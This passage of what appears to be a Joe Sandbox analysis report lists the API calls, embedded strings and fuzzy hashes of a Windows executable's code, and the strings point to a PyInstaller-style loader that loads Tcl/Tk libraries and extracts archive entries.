                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F06272B1D2959ADBA49F2DA802629B7D0F748380F80803DE69DC7B18D63DD1608F54
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6c002e7d7884e8c4061cd0b6b52ae5efdc83914f73eae79fef453be1d5e57078
                                                                                                                                                                                                            • Instruction ID: af0620f5329bd1a35c6ef7951f9bd95bce40a10ed546ab8812ea27c9c7a4c7a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c002e7d7884e8c4061cd0b6b52ae5efdc83914f73eae79fef453be1d5e57078
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13A0017295EA46F4EA95AB00E960030A220FB60382BCA2131D00D614B49E2DE5108720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
• String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                            • API String ID: 2238633743-1453502826
                                                                                                                                                                                                            • Opcode ID: a7ac00ce1a7fdfc215a9c78db55a5cef2ac37261bb2bde1204b0c918028e9db3
                                                                                                                                                                                                            • Instruction ID: 5d20e367a171e35ee49b282444539146df545677df75b314cf85fa20483d0628
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7ac00ce1a7fdfc215a9c78db55a5cef2ac37261bb2bde1204b0c918028e9db3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98E1E274A0FB83B8FE55EF15A981174A3A5AF04782BDA6031D80E362B4EF7CE4548370
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                            • Opcode ID: f5a3bd79b12c7c571d23b6b5ebdfb181c7e65479c9c05912b09222cce72f5b00
                                                                                                                                                                                                            • Instruction ID: 0b7826430d0cf7a90934adf39a70d1d8bb12a0e76d323ea0f73b036c269b5f03
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5a3bd79b12c7c571d23b6b5ebdfb181c7e65479c9c05912b09222cce72f5b00
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE51F536609BA186D634AF26E4181BAF7A1FB98B62F004121EBCF53694DF3CD045DB20
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                            • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                            • Instruction ID: da6b3b31c4d8d90aab4c54c2e049d9ab2bfaa8acaa5cc2628c37f0eb8c7c78fa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2712E672E0E183A6FB20BA94E0542BDF6A1FB48750FC54075F689666E4CF3CE5808B60
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                            • Opcode ID: 4c00a865390b6ee80d28535fbbf127f72415018508e978614aee0788645671fc
                                                                                                                                                                                                            • Instruction ID: 593627fda9dab8f558f792bd231727e4e0d85f49fb528d0963f37c8082c8414b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c00a865390b6ee80d28535fbbf127f72415018508e978614aee0788645671fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A418131A0E7C2A6EA24FB11E5006AAF3A0EF44795FC64431DE4D67B65EE3CE442C760
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                            • Opcode ID: 905927d9e3da027d40e91907a7f1dd58b6d09944997845db9437df3d999e9f33
                                                                                                                                                                                                            • Instruction ID: 5d1751316ef1f5eab15ddae75398b5635df98f9a966358a2baaa60517066b618
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905927d9e3da027d40e91907a7f1dd58b6d09944997845db9437df3d999e9f33
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE1D732A0D78296EB20AF65D6413ADB7E0FB45B89F410135EE4DABB65CF38E580C710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF7ACE9E082,?,?,0000022254556BC8,00007FF7ACE9A153,?,?,?,00007FF7ACE9A04A,?,?,?,00007FF7ACE953A2), ref: 00007FF7ACE9DE64
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000,?,00007FF7ACE9E082,?,?,0000022254556BC8,00007FF7ACE9A153,?,?,?,00007FF7ACE9A04A,?,?,?,00007FF7ACE953A2), ref: 00007FF7ACE9DE70
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                            • Opcode ID: 3f9ea5ddd66982662272f3b60427da02763780b89cc10366f1f57cf1354b879c
                                                                                                                                                                                                            • Instruction ID: ef2aa6d2e5a971071294e3ceaeec42b4989394e42f5454e2013f99957e563748
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f9ea5ddd66982662272f3b60427da02763780b89cc10366f1f57cf1354b879c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4413671B1F61271FA15AB169810575E792BF04BA0F8A4235ED0DBB7B8EF3CE5058320
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE8760F
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE8765F
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                            • API String ID: 626452242-27947307
                                                                                                                                                                                                            • Opcode ID: 4c75aad5540be6d6cf442b20722a3a637b86b79be2c0eb90bd337d9e394b857c
                                                                                                                                                                                                            • Instruction ID: e2ec6177175a16ff15230b6a86fbe89e2ea7d453b012df15b2b9d915e3ad3769
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c75aad5540be6d6cf442b20722a3a637b86b79be2c0eb90bd337d9e394b857c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4419032A0EB82D6E720EF15B44016AF7A4FB84791F9A4135EA8D57BA8DF3CD052D710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE87AF1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE87B65
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                                                                            • Opcode ID: 92b52a23bf177b804bd471eb00781d9ecb554dad94de0916a037b448ee798d7d
                                                                                                                                                                                                            • Instruction ID: 108a2f5d446a2246b8831e8ed74b1f0d2a16c46b9871131daed29ae2ceefcc1b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92b52a23bf177b804bd471eb00781d9ecb554dad94de0916a037b448ee798d7d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B218031B0EB82A9EA10EF25A940079F3A2FB54BD1F994135DA4D637B5EF7CE4518310
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: f$p$p
                                                                                                                                                                                                            • API String ID: 3215553584-1995029353
                                                                                                                                                                                                            • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                            • Instruction ID: 6fd12ca7f0a0904bece7afa7476e9d33009f3bc6c9a924806eb8700c92d6cb9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6129072A0E243A6FB20BE15E0546BAF691FB40750FCA4175F68D566E4DF3CED808B21
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                            • API String ID: 626452242-876015163
                                                                                                                                                                                                            • Opcode ID: 0d5216bbebe1e4d5e4fda212484cc9b67e4195dbf35dd583a6e8b35915cdcea1
                                                                                                                                                                                                            • Instruction ID: 3c2c21d525b923d4fa470110272f6166fdeacbee437a8c51b803d92322e640c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d5216bbebe1e4d5e4fda212484cc9b67e4195dbf35dd583a6e8b35915cdcea1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A41B032B0EA82E6E620EF15A44017AF6A5FB48791F9A4135EE4D67BB4DF3CD051C720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEAD
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEBB
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEE5
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CF2B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CF37
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                            • Opcode ID: 5875a968ec1c8163f4728790c5c34772c02e6e55674a02490018482c9d800bcd
                                                                                                                                                                                                            • Instruction ID: 9bd18943ff91ac958b9241b69cb3dd60a6f2910d3ecab83f49810efe2ddf4b71
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5875a968ec1c8163f4728790c5c34772c02e6e55674a02490018482c9d800bcd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC31C132A1F682B5FE51AF02A900575B2D4BF09BA1F9B4535ED1D6A3A0EF3CE4458720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7ACE867AF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7ACE864BF
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82770: MessageBoxW.USER32 ref: 00007FF7ACE82841
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7ACE864D3
                                                                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7ACE8651A
                                                                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7ACE86496
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                            • API String ID: 1662231829-3498232454
                                                                                                                                                                                                            • Opcode ID: b60e1185c9f9ee707b49e7ed4e3a4a995e0c101ca8882adb9a2ed2a45595f786
                                                                                                                                                                                                            • Instruction ID: 099da92983183ff0bed5e8c1ee8c70a1594bd78d14001c93cc879eef496f46f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b60e1185c9f9ee707b49e7ed4e3a4a995e0c101ca8882adb9a2ed2a45595f786
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8531CC35B1E7C260FE20F721D6552B9E2516F94782FC50431DA4E727F9EE2CE1048720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE87A60
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                                                                            • Opcode ID: ee2ee3c888b621b3c3f4dc33b354bcabab4fe5f972038a38ac2187e11a85846b
                                                                                                                                                                                                            • Instruction ID: 59ce6404e3286414f3de503832cd4f8fe93af2fc6babc8c68ea61fcecd10c73e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee2ee3c888b621b3c3f4dc33b354bcabab4fe5f972038a38ac2187e11a85846b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2219132B0DA82A5EB50EB19F50007AE3A1EB987C5F9D4171DB4CA3BB9EF2DD5418710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A55F
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A574
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A595
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5C2
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5D3
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5E4
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: 408c089a3b640914283472138efc63105aff7241411df2dd409cda215309df11
                                                                                                                                                                                                            • Instruction ID: d661c579c551c39ec14e56aea77414dc34ef77d06e05bd30556e993f60abf717
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 408c089a3b640914283472138efc63105aff7241411df2dd409cda215309df11
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3218E30B0F24262FA6873215645139E2525F447B4FD64774F93E7B7FAEE2CE8508221
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                            • Opcode ID: 5d0318ae55f50b6dcee6d616b573d53fae0e0d17b0b79c1b3a6779b9b80778ff
                                                                                                                                                                                                            • Instruction ID: d918e8db599752cf29f9031b10db7a9b60d58ced6bfa92792ba38df8122a5c67
